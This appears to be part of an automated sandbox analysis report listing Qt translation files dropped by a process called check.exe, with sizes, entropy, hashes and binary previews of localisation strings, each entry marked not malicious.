                                                                                                                                                                                                            Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                            Entropy (8bit):4.70568613551943
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                            MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                            SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                            SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                            SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10363
                                                                                                                                                                                                            Entropy (8bit):4.613473842638716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                            MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                            SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                            SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                            SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.68793836539357
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                            MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                            SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                            SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                            SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9750
                                                                                                                                                                                                            Entropy (8bit):5.281035122342072
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                            MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                            SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                            SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                            SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6441
                                                                                                                                                                                                            Entropy (8bit):5.790303416386852
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                            MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                            SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                            SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                            SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9301
                                                                                                                                                                                                            Entropy (8bit):5.80411750798786
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                            MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                            SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                            SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                            SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                            MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                            SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                            SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                            SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                            MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                            SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                            SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                            SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.599979504080125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                            MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                            SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                            SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                            SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.652277257665055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                            MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                            SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                            SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                            SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165383
                                                                                                                                                                                                            Entropy (8bit):4.805977227348512
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                            MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                            SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                            SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                            SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):89
                                                                                                                                                                                                            Entropy (8bit):4.156834975253888
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                            MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                            SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                            SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                            SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161
                                                                                                                                                                                                            Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                            MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                            SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                            SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                            SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70334
                                                                                                                                                                                                            Entropy (8bit):4.732724622610353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                            MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                            SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                            SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                            SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):3.984562388316898
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                            MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                            SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                            SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                            SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                            MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                            SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                            SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                            SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):228428
                                                                                                                                                                                                            Entropy (8bit):4.726953418955661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                            MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                            SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                            SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                            SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
